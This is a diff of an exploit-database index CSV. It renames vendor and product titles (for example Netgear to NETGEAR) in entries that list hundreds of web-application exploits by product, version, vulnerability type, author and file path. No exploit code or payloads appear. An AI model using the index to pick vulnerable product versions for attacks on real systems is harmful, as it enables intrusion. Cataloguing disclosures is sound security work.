Priyamal",php,webapps,0 17347,platforms/php/webapps/17347.php,"Easy Media Script - SQL Injection",2011-05-30,Lagripe-Dz,php,webapps,0 -17349,platforms/hardware/webapps/17349.txt,"Belkin G Wireless Router F5D7234-4 v5 - Exploit",2011-05-30,Aodrulez,hardware,webapps,0 +17349,platforms/hardware/webapps/17349.txt,"Belkin F5D7234-4 v5 G Wireless Router - Exploit",2011-05-30,Aodrulez,hardware,webapps,0 17350,platforms/php/webapps/17350.txt,"Guru JustAnswer Professional 1.25 - Multiple SQL Injections",2011-05-30,v3n0m,php,webapps,0 17360,platforms/windows/webapps/17360.txt,"WebSVN 2.3.2 - Unproper Metacharacters Escaping 'exec()' Remote Command Injection",2011-06-04,rgod,windows,webapps,0 17367,platforms/php/webapps/17367.html,"Dataface - Local File Inclusion",2011-06-07,ITSecTeam,php,webapps,0 @@ -25674,7 +25678,7 @@ id,file,description,date,author,platform,type,port 17871,platforms/hardware/webapps/17871.txt,"Cisco TelePresence SOS-11-010 - Multiple Vulnerabilities",2011-09-19,"Sense of Security",hardware,webapps,0 17872,platforms/php/webapps/17872.txt,"Multiple WordPress Plugins - 'timthumb.php' File Upload",2011-09-19,"Ben Schmidt",php,webapps,0 17873,platforms/windows/webapps/17873.txt,"SharePoint 2007/2010 and DotNetNuke < 6 - File Disclosure (via XEE)",2011-09-20,"Nicolas Gregoire",windows,webapps,0 -17874,platforms/hardware/webapps/17874.txt,"Netgear Wireless Cable Modem Gateway - Authentication Bypass / Cross-Site Request Forgery",2011-09-20,"Sense of Security",hardware,webapps,0 +17874,platforms/hardware/webapps/17874.txt,"NETGEAR Wireless Cable Modem Gateway - Authentication Bypass / Cross-Site Request Forgery",2011-09-20,"Sense of Security",hardware,webapps,0 17882,platforms/php/webapps/17882.php,"JAKCMS PRO 2.2.5 - Arbitrary File Upload",2011-09-22,EgiX,php,webapps,0 17887,platforms/php/webapps/17887.txt,"WordPress Plugin Link Library 5.2.1 - SQL Injection",2011-09-24,"Miroslav Stampar",php,webapps,0 17888,platforms/php/webapps/17888.txt,"WordPress Plugin AdRotate 3.6.5 - SQL Injection",2011-09-24,"Miroslav Stampar",php,webapps,0 @@ -27495,7 +27499,7 @@ id,file,description,date,author,platform,type,port 24122,platforms/cgi/webapps/24122.txt,"TurboTrafficTrader C 1.0 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2004-05-17,"Kaloyan Olegov Georgiev",cgi,webapps,0 24124,platforms/php/webapps/24124.txt,"vBulletin 1.0/2.x/3.0 - 'index.php' User Interface Spoofing",2004-05-17,p0rk,php,webapps,0 24126,platforms/php/webapps/24126.txt,"osCommerce 2.x - File Manager Directory Traversal",2004-05-17,Rene,php,webapps,0 -24127,platforms/php/webapps/24127.txt,"PHP-Nuke 6.x/7.x - Modpath Parameter Potential File Inclusion",2004-05-17,waraxe,php,webapps,0 +24127,platforms/php/webapps/24127.txt,"PHP-Nuke 6.x/7.x - 'Modpath' Parameter File Inclusion",2004-05-17,waraxe,php,webapps,0 24131,platforms/php/webapps/24131.txt,"dsm light Web file browser 2.0 - Directory Traversal",2004-05-18,Humberto,php,webapps,0 24134,platforms/php/webapps/24134.txt,"CMS snews - SQL Injection",2013-01-15,"By onestree",php,webapps,0 24138,platforms/php/webapps/24138.txt,"e107 Website System 0.5/0.6 - Log.php HTML Injection",2004-05-21,Chinchilla,php,webapps,0 @@ -27646,7 +27650,7 @@ id,file,description,date,author,platform,type,port 24424,platforms/php/webapps/24424.txt,"Newtelligence DasBlog 1.x - Request Log HTML Injection",2004-09-01,"Dominick Baier",php,webapps,0 24425,platforms/php/webapps/24425.txt,"phpWebSite 0.7.3/0.8.x/0.9.x - Comment Module CM_pid Cross-Site Scripting",2004-09-01,"GulfTech Security",php,webapps,0 24432,platforms/windows/webapps/24432.txt,"Microsoft Internet Explorer 8/9 - Steal Any Cookie",2013-01-28,"Christian Haider",windows,webapps,0 -24441,platforms/hardware/webapps/24441.txt,"Netgear SPH200D - Multiple Vulnerabilities",2013-01-31,m-1-k-3,hardware,webapps,0 +24441,platforms/hardware/webapps/24441.txt,"NETGEAR SPH200D - Multiple Vulnerabilities",2013-01-31,m-1-k-3,hardware,webapps,0 24508,platforms/php/webapps/24508.txt,"Scripts Genie Gallery Personals - 'gallery.php' L' Parameter SQL Injection",2013-02-17,3spi0n,php,webapps,0 24433,platforms/php/webapps/24433.txt,"PHP weby directory software 1.2 - Multiple Vulnerabilities",2013-01-28,AkaStep,php,webapps,0 24435,platforms/hardware/webapps/24435.txt,"Fortinet FortiMail 400 IBE - Multiple Vulnerabilities",2013-01-29,Vulnerability-Lab,hardware,webapps,0 @@ -27664,7 +27668,7 @@ id,file,description,date,author,platform,type,port 24456,platforms/php/webapps/24456.txt,"glossword 1.8.12 - Multiple Vulnerabilities",2013-02-05,AkaStep,php,webapps,0 24457,platforms/php/webapps/24457.txt,"Glossword 1.8.3 - SQL Injection",2013-02-05,AkaStep,php,webapps,0 24462,platforms/php/webapps/24462.txt,"Hiverr 2.2 - Multiple Vulnerabilities",2013-02-06,xStarCode,php,webapps,0 -24464,platforms/hardware/webapps/24464.txt,"Netgear DGN1000B - Multiple Vulnerabilities",2013-02-07,m-1-k-3,hardware,webapps,0 +24464,platforms/hardware/webapps/24464.txt,"NETGEAR DGN1000B - Multiple Vulnerabilities",2013-02-07,m-1-k-3,hardware,webapps,0 24465,platforms/php/webapps/24465.txt,"CubeCart 5.2.0 - 'cubecart.class.php' PHP Object Injection",2013-02-07,EgiX,php,webapps,0 24466,platforms/hardware/webapps/24466.txt,"WirelessFiles 1.1 iPad iPhone - Multiple Vulnerabilities",2013-02-07,Vulnerability-Lab,hardware,webapps,0 24510,platforms/php/webapps/24510.txt,"Scripts Genie Domain Trader - 'catalog.php' 'id' Parameter SQL Injection",2013-02-17,3spi0n,php,webapps,0 @@ -27691,7 +27695,7 @@ id,file,description,date,author,platform,type,port 24506,platforms/php/webapps/24506.txt,"Cometchat - Multiple Vulnerabilities",2013-02-15,B127Y,php,webapps,0 24507,platforms/php/webapps/24507.txt,"ChillyCMS 1.3.0 - Multiple Vulnerabilities",2013-02-15,"Abhi M Balakrishnan",php,webapps,0 24512,platforms/php/webapps/24512.txt,"Scripts Genie Top Sites - 'out.php' 'id' Parameter SQL Injection",2013-02-17,3spi0n,php,webapps,0 -24513,platforms/hardware/webapps/24513.txt,"Netgear DGN2200B - Multiple Vulnerabilities",2013-02-18,m-1-k-3,hardware,webapps,0 +24513,platforms/hardware/webapps/24513.txt,"NETGEAR DGN2200B - Multiple Vulnerabilities",2013-02-18,m-1-k-3,hardware,webapps,0 24514,platforms/php/webapps/24514.txt,"Scripts Genie Pet Rate Pro - Multiple Vulnerabilities",2013-02-18,TheMirkin,php,webapps,0 24515,platforms/php/webapps/24515.txt,"Cometchat Application - Multiple Vulnerabilities",2013-02-18,z3r0sPlOiT,php,webapps,0 24516,platforms/php/webapps/24516.txt,"Scripts Genie Hot Scripts Clone - 'showcategory.php' 'cid' Parameter SQL Injection",2013-02-18,"Easy Laster",php,webapps,0 @@ -27892,7 +27896,7 @@ id,file,description,date,author,platform,type,port 24913,platforms/php/webapps/24913.txt,"Network Weathermap 0.97a - 'editor.php' Persistent Cross-Site Scripting",2013-04-02,"Daniel Ricardo dos Santos",php,webapps,0 24914,platforms/php/webapps/24914.txt,"WordPress Plugin FuneralPress 1.1.6 - Persistent Cross-Site Scripting",2013-04-02,"Rob Armstrong",php,webapps,0 24915,platforms/multiple/webapps/24915.txt,"Aspen 0.8 - Directory Traversal",2013-04-02,"Daniel Ricardo dos Santos",multiple,webapps,0 -24916,platforms/hardware/webapps/24916.txt,"Netgear WNR1000 - Authentication Bypass",2013-04-02,"Roberto Paleari",hardware,webapps,0 +24916,platforms/hardware/webapps/24916.txt,"NETGEAR WNR1000 - Authentication Bypass",2013-04-02,"Roberto Paleari",hardware,webapps,0 24924,platforms/hardware/webapps/24924.txt,"Belkin Wemo - Arbitrary Firmware Upload",2013-04-08,"Daniel Buentello",hardware,webapps,0 24926,platforms/hardware/webapps/24926.txt,"Multiple D-Link Devices - Multiple Vulnerabilities",2013-04-08,m-1-k-3,hardware,webapps,0 24927,platforms/php/webapps/24927.txt,"Vanilla Forums 2-0-18-4 - SQL Injection",2013-04-08,bl4ckw0rm,php,webapps,0 @@ -28263,7 +28267,7 @@ id,file,description,date,author,platform,type,port 25528,platforms/php/webapps/25528.txt,"WoltLab Burning Board 2.3.1 - PMS.php Cross-Site Scripting",2005-04-25,deluxe89,php,webapps,0 25529,platforms/asp/webapps/25529.txt,"StorePortal 2.63 - 'default.asp' Multiple SQL Injections",2005-04-25,Dcrab,asp,webapps,0 25530,platforms/asp/webapps/25530.txt,"OneWorldStore - IDOrder Information Disclosure",2005-04-25,Lostmon,asp,webapps,0 -25531,platforms/php/webapps/25531.html,"PHPMyVisites 1.3 - Set_Lang File Inclusion",2005-04-26,"Max Cerny",php,webapps,0 +25531,platforms/php/webapps/25531.html,"PHPMyVisites 1.3 - 'Set_Lang' File Inclusion",2005-04-26,"Max Cerny",php,webapps,0 25532,platforms/php/webapps/25532.txt,"Yappa-ng 1.x/2.x - Unspecified Remote File Inclusion",2005-04-24,"James Bercegay",php,webapps,0 25533,platforms/php/webapps/25533.txt,"Yappa-ng 1.x/2.x - Unspecified Cross-Site Scripting",2005-04-24,"James Bercegay",php,webapps,0 25534,platforms/php/webapps/25534.txt,"SqWebMail 3.x/4.0 - HTTP Response Splitting",2005-04-15,Zinho,php,webapps,0 @@ -28599,17 +28603,17 @@ id,file,description,date,author,platform,type,port 25957,platforms/php/webapps/25957.txt,"PunBB 1.x - 'profile.php' User Profile Edit Module SQL Injection",2005-07-08,"Stefan Esser",php,webapps,0 25958,platforms/php/webapps/25958.txt,"ID Team ID Board 1.1.3 - SQL.CLS.php SQL Injection",2005-07-10,Defa,php,webapps,0 25959,platforms/php/webapps/25959.txt,"Spid 1.3 - lang_path File Inclusion",2005-07-11,"skdaemon porra",php,webapps,0 -25960,platforms/php/webapps/25960.txt,"PPA 0.5.6 - ppa_root_path File Inclusion",2005-07-10,"skdaemon porra",php,webapps,0 +25960,platforms/php/webapps/25960.txt,"PPA 0.5.6 - 'ppa_root_path' File Inclusion",2005-07-10,"skdaemon porra",php,webapps,0 25963,platforms/asp/webapps/25963.txt,"Dragonfly Commerce 1.0 - Multiple SQL Injections",2005-07-12,"Diabolic Crab",asp,webapps,0 25964,platforms/php/webapps/25964.c,"PHPsFTPd 0.2/0.4 - Inc.login.php Privilege Escalation",2005-07-11,"Stefan Lochbihler",php,webapps,0 25965,platforms/asp/webapps/25965.txt,"DVBBS 7.1 - ShowErr.asp Cross-Site Scripting",2005-07-12,rUnViRuS,asp,webapps,0 25968,platforms/hardware/webapps/25968.pl,"Seowonintech Routers fw: 2.3.9 - File Disclosure",2013-06-05,"Todor Donev",hardware,webapps,0 -25969,platforms/hardware/webapps/25969.txt,"Netgear WPN824v3 - Unauthorized Config Download",2013-06-05,"Jens Regel",hardware,webapps,0 +25969,platforms/hardware/webapps/25969.txt,"NETGEAR WPN824v3 - Unauthorized Config Download",2013-06-05,"Jens Regel",hardware,webapps,0 25971,platforms/php/webapps/25971.txt,"Cuppa CMS - 'alertConfigField.php' Local/Remote File Inclusion",2013-06-05,"CWH Underground",php,webapps,0 25973,platforms/php/webapps/25973.txt,"Ruubikcms 1.1.1 - 'tinybrowser.php' 'folder' Parameter Directory Traversal",2013-06-05,expl0i13r,php,webapps,0 25976,platforms/hardware/webapps/25976.txt,"DS3 - Authentication Server - Multiple Vulnerabilities",2013-06-05,"Pedro Andujar",hardware,webapps,0 25977,platforms/jsp/webapps/25977.txt,"Imperva SecureSphere Operations Manager 9.0.0.5 - Multiple Vulnerabilities",2013-06-05,"Pedro Andujar",jsp,webapps,0 -25978,platforms/hardware/webapps/25978.txt,"Netgear DGN1000 / DGN2200 - Multiple Vulnerabilities",2013-06-05,"Roberto Paleari",hardware,webapps,80 +25978,platforms/hardware/webapps/25978.txt,"NETGEAR DGN1000 / DGN2200 - Multiple Vulnerabilities",2013-06-05,"Roberto Paleari",hardware,webapps,80 25981,platforms/asp/webapps/25981.txt,"Hosting Controller 6.1 - Multiple SQL Injections",2005-07-13,"Soroush Dalili",asp,webapps,0 25982,platforms/cfm/webapps/25982.txt,"Simple Message Board 2.0 beta1 - Forum.cfm Cross-Site Scripting",2005-07-14,rUnViRuS,cfm,webapps,0 25983,platforms/cfm/webapps/25983.txt,"Simple Message Board 2.0 beta1 - User.cfm Cross-Site Scripting",2005-07-14,rUnViRuS,cfm,webapps,0 @@ -29991,7 +29995,7 @@ id,file,description,date,author,platform,type,port 27855,platforms/php/webapps/27855.txt,"Vizra - A_Login.php Cross-Site Scripting",2006-05-11,R00TT3R,php,webapps,0 27857,platforms/php/webapps/27857.txt,"phpBB Chart Mod 1.1 - charts.php id Parameter SQL Injection",2006-05-11,sn4k3.23,php,webapps,0 27773,platforms/php/webapps/27773.txt,"CBHotel Hotel Software and Booking system 1.8 - Multiple Vulnerabilities",2013-08-22,"Dylan Irzi",php,webapps,0 -27774,platforms/hardware/webapps/27774.py,"Netgear ProSafe - Information Disclosure",2013-08-22,"Juan J. Guelfo",hardware,webapps,0 +27774,platforms/hardware/webapps/27774.py,"NETGEAR ProSafe - Information Disclosure",2013-08-22,"Juan J. Guelfo",hardware,webapps,0 27776,platforms/linux/webapps/27776.rb,"Foreman (RedHat OpenStack/Satellite) - users/create Mass Assignment (Metasploit)",2013-08-22,Metasploit,linux,webapps,443 27777,platforms/windows/webapps/27777.txt,"DeWeS 0.4.2 - Directory Traversal",2013-08-22,"High-Tech Bridge SA",windows,webapps,0 27779,platforms/php/webapps/27779.txt,"Advanced Guestbook 2.x - 'Addentry.php' Remote File Inclusion",2006-04-29,[Oo],php,webapps,0 @@ -31888,7 +31892,7 @@ id,file,description,date,author,platform,type,port 32394,platforms/asp/webapps/32394.txt,"Sama Educational Management System - 'error.asp' Cross-Site Scripting",2008-09-18,Lagon666,asp,webapps,0 32392,platforms/php/webapps/32392.pl,"Add a link 4 - Security Bypass / SQL Injection",2008-09-17,JosS,php,webapps,0 32388,platforms/php/webapps/32388.txt,"Cars & Vehicle - 'page.php' SQL Injection",2008-09-17,"Hussin X",php,webapps,0 -33984,platforms/hardware/webapps/33984.rb,"Netgear WNR1000v3 - Password Recovery Credential Disclosure (Metasploit)",2014-07-07,c1ph04,hardware,webapps,0 +33984,platforms/hardware/webapps/33984.rb,"NETGEAR WNR1000v3 - Password Recovery Credential Disclosure (Metasploit)",2014-07-07,c1ph04,hardware,webapps,0 30581,platforms/php/webapps/30581.txt,"CS-Guestbook 0.1 - Login Credentials Information Disclosure",2007-09-12,Cr@zy_King,php,webapps,0 30583,platforms/php/webapps/30583.txt,"PHP-Stats 0.1.9.2 - Tracking.php Cross-Site Scripting",2007-09-14,root@hanicker.it,php,webapps,0 30585,platforms/cgi/webapps/30585.txt,"Axis Communications 207W Network Camera - Web Interface axis-cgi/admin/restart.cgi Cross-Site Request Forgery",2007-09-14,"Seth Fogie",cgi,webapps,0 @@ -33073,7 +33077,7 @@ id,file,description,date,author,platform,type,port 32455,platforms/php/webapps/32455.pl,"Website Directory - 'index.php' Cross-Site Scripting",2008-10-03,"Ghost Hacker",php,webapps,0 32459,platforms/java/webapps/32459.txt,"VeriSign Kontiki Delivery Management System 5.0 - 'action' Parameter Cross-Site Scripting",2008-10-05,"Mazin Faour",java,webapps,0 32461,platforms/php/webapps/32461.txt,"AmpJuke 0.7.5 - 'index.php' SQL Injection",2008-10-03,S_DLA_S,php,webapps,0 -32462,platforms/php/webapps/32462.txt,"Simple Machines Forum (SMF) 1.1.6 - POST Request Filter Security Bypass",2008-10-06,WHK,php,webapps,0 +32462,platforms/php/webapps/32462.txt,"Simple Machines Forum (SMF) 1.1.6 - POST Filter Security Bypass",2008-10-06,WHK,php,webapps,0 32463,platforms/php/webapps/32463.txt,"PHP Web Explorer 0.99b - main.php refer Parameter Traversal Local File Inclusion",2008-10-06,Pepelux,php,webapps,0 32464,platforms/php/webapps/32464.txt,"PHP Web Explorer 0.99b - 'edit.php' File Parameter Traversal Local File Inclusion",2008-10-06,Pepelux,php,webapps,0 32467,platforms/php/webapps/32467.txt,"Opera Web Browser 8.51 - URI redirection Remote Code Execution",2008-10-08,MATASANOS,php,webapps,0 @@ -33332,7 +33336,7 @@ id,file,description,date,author,platform,type,port 32875,platforms/php/webapps/32875.txt,"Comparison Engine Power 1.0 - 'product.comparision.php' SQL Injection",2009-03-25,SirGod,php,webapps,0 32880,platforms/php/webapps/32880.txt,"Turnkey eBook Store 1.1 - 'keywords' Parameter Cross-Site Scripting",2009-03-31,TEAMELITE,php,webapps,0 32882,platforms/asp/webapps/32882.txt,"SAP Business Objects Crystal Reports 7-10 - 'viewreport.asp' Cross-Site Scripting",2009-04-02,"Bugs NotHugs",asp,webapps,0 -32883,platforms/hardware/webapps/32883.txt,"Netgear N600 Wireless Dual Band WNDR3400 - Multiple Vulnerabilities",2014-04-15,"Santhosh Kumar",hardware,webapps,8080 +32883,platforms/hardware/webapps/32883.txt,"NETGEAR WNDR3400 N600 Wireless Dual Band - Multiple Vulnerabilities",2014-04-15,"Santhosh Kumar",hardware,webapps,8080 32886,platforms/hardware/webapps/32886.txt,"Xerox DocuShare - SQL Injection",2014-04-15,"Brandon Perry",hardware,webapps,8080 32888,platforms/asp/webapps/32888.txt,"Asbru Web Content Management 6.5/6.6.9 - SQL Injection / Cross-Site Scripting",2009-04-02,"Patrick Webster",asp,webapps,0 32889,platforms/php/webapps/32889.txt,"4CMS - SQL Injection / Local File Inclusion",2009-04-02,k1ll3r_null,php,webapps,0 @@ -33444,7 +33448,7 @@ id,file,description,date,author,platform,type,port 33126,platforms/php/webapps/33126.txt,"Matterdaddy Market 1.x - 'index.php' Cross-Site Scripting",2009-06-28,Moudi,php,webapps,0 33127,platforms/php/webapps/33127.txt,"Miniweb 2.0 Site Builder Module - Multiple Cross-Site Scripting Vulnerabilities",2009-06-29,Moudi,php,webapps,0 40080,platforms/php/webapps/40080.txt,"Tiki Wiki CMS 15.0 - Arbitrary File Download",2016-07-11,"Kacper Szurek",php,webapps,80 -40081,platforms/cgi/webapps/40081.py,"Belkin Router AC1200 Firmware 1.00.27 - Authentication Bypass",2016-07-11,"Gregory Smiley",cgi,webapps,80 +40081,platforms/cgi/webapps/40081.py,"Belkin AC1200 Router Firmware 1.00.27 - Authentication Bypass",2016-07-11,"Gregory Smiley",cgi,webapps,80 40082,platforms/php/webapps/40082.txt,"WordPress Plugin All in One SEO Pack 2.3.6.1 - Persistent Cross-Site Scripting",2016-07-11,"David Vaartjes",php,webapps,80 33197,platforms/php/webapps/33197.txt,"68 Classifieds 4.1 - 'category.php' Cross-Site Scripting",2009-07-27,Moudi,php,webapps,0 33130,platforms/php/webapps/33130.txt,"NTSOFT BBS E-Market Professional - Multiple Cross-Site Scripting Vulnerabilities (1)",2009-06-30,"Ivan Sanchez",php,webapps,0 @@ -33452,7 +33456,7 @@ id,file,description,date,author,platform,type,port 33132,platforms/php/webapps/33132.txt,"Softbiz Dating Script 1.0 - 'cat_products.php' SQL Injection",2009-07-30,MizoZ,php,webapps,0 33136,platforms/hardware/webapps/33136.txt,"Fritz!Box - Remote Command Execution",2014-05-01,0x4148,hardware,webapps,0 33340,platforms/php/webapps/33340.txt,"CuteNews 1.4.6 - 'index.php' Multiple Parameter Cross-Site Scripting",2009-11-10,"Andrew Horton",php,webapps,0 -33138,platforms/hardware/webapps/33138.txt,"Netgear DGN2200 1.0.0.29_1.7.29_HotS - Persistent Cross-Site Scripting",2014-05-01,"Dolev Farhi",hardware,webapps,0 +33138,platforms/hardware/webapps/33138.txt,"NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Persistent Cross-Site Scripting",2014-05-01,"Dolev Farhi",hardware,webapps,0 33144,platforms/php/webapps/33144.txt,"Censura < 2.1.1 - Multiple Cross-Site Scripting Vulnerabilities",2009-06-29,mark99,php,webapps,0 33146,platforms/php/webapps/33146.txt,"CS-Cart 2.0.5 - 'reward_points.post.php' SQL Injection",2009-08-04,"Ryan Dewhurst",php,webapps,0 33147,platforms/php/webapps/33147.txt,"AJ Auction Pro 3.0 - 'txtkeyword' Parameter Cross-Site Scripting",2009-08-05,"599eme Man",php,webapps,0 @@ -33979,7 +33983,7 @@ id,file,description,date,author,platform,type,port 34127,platforms/php/webapps/34127.txt,"Arab Portal 2.2 - 'members.php' SQL Injection",2010-06-10,SwEET-DeViL,php,webapps,0 34128,platforms/hardware/webapps/34128.py,"MTS MBlaze Ultra Wi-Fi / ZTE AC3633 - Multiple Vulnerabilities",2014-07-21,"Ajin Abraham",hardware,webapps,80 34161,platforms/php/webapps/34161.txt,"WordPress Plugin Video Gallery 2.5 - Multiple Vulnerabilities",2014-07-24,"Claudio Viviani",php,webapps,80 -34149,platforms/hardware/webapps/34149.txt,"Netgear DGN2200 1.0.0.29_1.7.29_HotS - Password Disclosure",2014-07-23,"Dolev Farhi",hardware,webapps,0 +34149,platforms/hardware/webapps/34149.txt,"NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Password Disclosure",2014-07-23,"Dolev Farhi",hardware,webapps,0 34159,platforms/php/webapps/34159.txt,"Joomla! Component Gallery XML 1.1 - SQL Injection / Local File Inclusion",2010-06-18,jdc,php,webapps,0 34163,platforms/hardware/webapps/34163.txt,"Lian Li NAS - Multiple Vulnerabilities",2014-07-24,pws,hardware,webapps,0 34165,platforms/multiple/webapps/34165.txt,"Zenoss Monitoring System 4.2.5-2108 (x64) - Persistent Cross-Site Scripting",2014-07-25,"Dolev Farhi",multiple,webapps,0 @@ -34733,7 +34737,7 @@ id,file,description,date,author,platform,type,port 35327,platforms/php/webapps/35327.txt,"CiviCRM 3.3.3 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-08,"AutoSec Tools",php,webapps,0 35328,platforms/php/webapps/35328.txt,"UMI CMS 2.8.1.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-08,"High-Tech Bridge SA",php,webapps,0 35329,platforms/php/webapps/35329.txt,"PHPXref 0.7 - 'nav.html' Cross-Site Scripting",2011-02-09,MustLive,php,webapps,0 -35330,platforms/php/webapps/35330.txt,"ManageEngine ADSelfService Plus 4.4 - POST Request Manipulation Security Question",2011-02-10,"Core Security",php,webapps,0 +35330,platforms/php/webapps/35330.txt,"ManageEngine ADSelfService Plus 4.4 - POST Manipulation Security Question",2011-02-10,"Core Security",php,webapps,0 35331,platforms/php/webapps/35331.txt,"ManageEngine ADSelfService Plus 4.4 - EmployeeSearch.cc Multiple Parameter Cross-Site Scripting",2011-02-10,"Core Security",php,webapps,0 35332,platforms/php/webapps/35332.txt,"Dolphin 7.0.4 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-10,"AutoSec Tools",php,webapps,0 35333,platforms/php/webapps/35333.py,"webERP 4.0.1 - 'InputSerialItemsFile.php' Arbitrary File Upload",2011-02-10,"AutoSec Tools",php,webapps,0 @@ -36284,7 +36288,7 @@ id,file,description,date,author,platform,type,port 37713,platforms/php/webapps/37713.txt,"2Moons - Multiple Vulnerabilities",2015-07-29,bRpsd,php,webapps,80 37714,platforms/php/webapps/37714.txt,"JoomShopping - Blind SQL Injection",2015-07-29,Mormoroth,php,webapps,80 37715,platforms/php/webapps/37715.txt,"Tendoo CMS 1.3 - Cross-Site Scripting",2015-07-29,"Arash Khazaei",php,webapps,80 -37720,platforms/hardware/webapps/37720.py,"Netgear ReadyNAS LAN /dbbroker 6.2.4 - Credential Disclosure",2015-07-31,St0rn,hardware,webapps,0 +37720,platforms/hardware/webapps/37720.py,"NETGEAR ReadyNAS LAN /dbbroker 6.2.4 - Credential Disclosure",2015-07-31,St0rn,hardware,webapps,0 37725,platforms/php/webapps/37725.txt,"Froxlor Server Management Panel 0.9.33.1 - MySQL Login Information Disclosure",2015-08-07,"Dustin Dörr",php,webapps,0 37726,platforms/php/webapps/37726.txt,"PHP News Script 4.0.0 - SQL Injection",2015-08-07,"Meisam Monsef",php,webapps,80 37734,platforms/php/webapps/37734.html,"Microweber 1.0.3 - Persistent Cross-Site Scripting / Cross-Site Request Forgery (Add Admin)",2015-08-07,LiquidWorm,php,webapps,80 @@ -36462,7 +36466,7 @@ id,file,description,date,author,platform,type,port 38101,platforms/php/webapps/38101.txt,"WordPress Plugin Zingiri Forums - 'language' Parameter Local File Inclusion",2012-12-30,Amirh03in,php,webapps,0 38102,platforms/php/webapps/38102.txt,"WordPress Theme Nest - 'codigo' Parameter SQL Injection",2012-12-04,"Ashiyane Digital Security Team",php,webapps,0 38103,platforms/php/webapps/38103.txt,"Sourcefabric Newscoop - 'f_email' Parameter SQL Injection",2012-12-04,AkaStep,php,webapps,0 -38097,platforms/hardware/webapps/38097.txt,"Netgear Wireless Management System 2.1.4.15 (Build 1236) - Privilege Escalation",2015-09-07,"Elliott Lewis",hardware,webapps,80 +38097,platforms/hardware/webapps/38097.txt,"NETGEAR Wireless Management System 2.1.4.15 (Build 1236) - Privilege Escalation",2015-09-07,"Elliott Lewis",hardware,webapps,80 38098,platforms/jsp/webapps/38098.txt,"JSPMySQL Administrador - Multiple Vulnerabilities",2015-09-07,hyp3rlinx,jsp,webapps,8081 38105,platforms/php/webapps/38105.txt,"WordPress Theme White-Label Framework 2.0.6 - Cross-Site Scripting",2015-09-08,Outlasted,php,webapps,80 38110,platforms/php/webapps/38110.txt,"DirectAdmin Web Control Panel 1.483 - Multiple Vulnerabilities",2015-09-08,"Ashiyane Digital Security Team",php,webapps,0 @@ -36638,7 +36642,7 @@ id,file,description,date,author,platform,type,port 38445,platforms/php/webapps/38445.txt,"Joomla! Component 'com_realestatemanager' 3.7 - SQL Injection",2015-10-11,"Omer Ramić",php,webapps,0 38446,platforms/php/webapps/38446.html,"Dream CMS 2.3.0 - Cross-Site Request Forgery (Add Extension) / Arbitrary File Upload / PHP Code Execution",2015-10-11,LiquidWorm,php,webapps,0 38448,platforms/hardware/webapps/38448.txt,"F5 Big-IP 10.2.4 Build 595.0 Hotfix HF3 - Directory Traversal",2015-10-13,"Karn Ganeshen",hardware,webapps,0 -38449,platforms/hardware/webapps/38449.txt,"Netgear Voice Gateway 2.3.0.23_2.3.23 - Multiple Vulnerabilities",2015-10-13,"Karn Ganeshen",hardware,webapps,0 +38449,platforms/hardware/webapps/38449.txt,"NETGEAR Voice Gateway 2.3.0.23_2.3.23 - Multiple Vulnerabilities",2015-10-13,"Karn Ganeshen",hardware,webapps,0 38450,platforms/php/webapps/38450.txt,"Kerio Control 8.6.1 - Multiple Vulnerabilities",2015-10-13,"Raschin Tavakoli",php,webapps,0 38455,platforms/hardware/webapps/38455.txt,"ZYXEL PMG5318-B20A - OS Command Injection",2015-10-14,"Karn Ganeshen",hardware,webapps,0 38476,platforms/php/webapps/38476.txt,"Todoo Forum 2.0 - todooforum.php Multiple Parameter Cross-Site Scripting",2013-04-14,"Chiekh Bouchenafa",php,webapps,0 @@ -36657,7 +36661,7 @@ id,file,description,date,author,platform,type,port 38482,platforms/php/webapps/38482.txt,"Crafty Syntax Live Help 3.1.2 - Remote File Inclusion / Full Path Disclosure",2013-04-19,ITTIHACK,php,webapps,0 38484,platforms/php/webapps/38484.rb,"WordPress Plugin Ajax Load More < 2.8.2 - Arbitrary File Upload",2015-10-18,PizzaHatHacker,php,webapps,0 38487,platforms/php/webapps/38487.txt,"WordPress Theme Colormix - Multiple Vulnerabilities",2013-04-21,MustLive,php,webapps,0 -38488,platforms/hardware/webapps/38488.txt,"Belkin Router N150 1.00.08/1.00.09 - Directory Traversal",2015-10-19,"Rahul Pratap Singh",hardware,webapps,0 +38488,platforms/hardware/webapps/38488.txt,"Belkin N150 Router 1.00.08/1.00.09 - Directory Traversal",2015-10-19,"Rahul Pratap Singh",hardware,webapps,0 38491,platforms/php/webapps/38491.php,"SMF - 'index.php' HTML Injection / Multiple PHP Code Injection Vulnerabilities",2013-04-23,"Jakub Galczyk",php,webapps,0 38494,platforms/php/webapps/38494.txt,"WordPress Plugin WP Super Cache - PHP Remote Code Execution",2013-04-24,anonymous,php,webapps,0 38496,platforms/php/webapps/38496.txt,"RealtyScript 4.0.2 - Multiple Cross-Site Request Forgery / Persistent Cross-Site Scripting Vulnerabilities",2015-10-19,LiquidWorm,php,webapps,0 @@ -36740,7 +36744,7 @@ id,file,description,date,author,platform,type,port 38646,platforms/jsp/webapps/38646.txt,"NXFilter 3.0.3 - Multiple Cross-Site Scripting Vulnerabilities",2015-11-06,hyp3rlinx,jsp,webapps,0 38648,platforms/php/webapps/38648.txt,"WordPress Plugin My Calendar 2.4.10 - Multiple Vulnerabilities",2015-11-06,Mysticism,php,webapps,0 38649,platforms/php/webapps/38649.txt,"Google AdWords API PHP client library 6.2.0 - Arbitrary PHP Code Execution",2015-11-07,"Dawid Golunski",php,webapps,0 -38651,platforms/php/webapps/38651.txt,"eBay Magento CE 1.9.2.1 - Unrestricted Cron Script (Potential Code Execution / Denial of Service)",2015-11-07,"Dawid Golunski",php,webapps,0 +38651,platforms/php/webapps/38651.txt,"eBay Magento CE 1.9.2.1 - Unrestricted Cron Script (Code Execution / Denial of Service)",2015-11-07,"Dawid Golunski",php,webapps,0 38652,platforms/php/webapps/38652.txt,"Google AdWords 6.2.0 API client libraries - XML eXternal Entity Injection (XXE)",2015-11-07,"Dawid Golunski",php,webapps,0 38653,platforms/asp/webapps/38653.txt,"Corda Highwire - 'Highwire.ashx' Full Path Disclosure",2013-07-12,"Adam Willard",asp,webapps,0 38654,platforms/php/webapps/38654.txt,"OpenEMR 4.1 - 'note' Parameter HTML Injection",2013-07-12,"Nate Drier",php,webapps,0 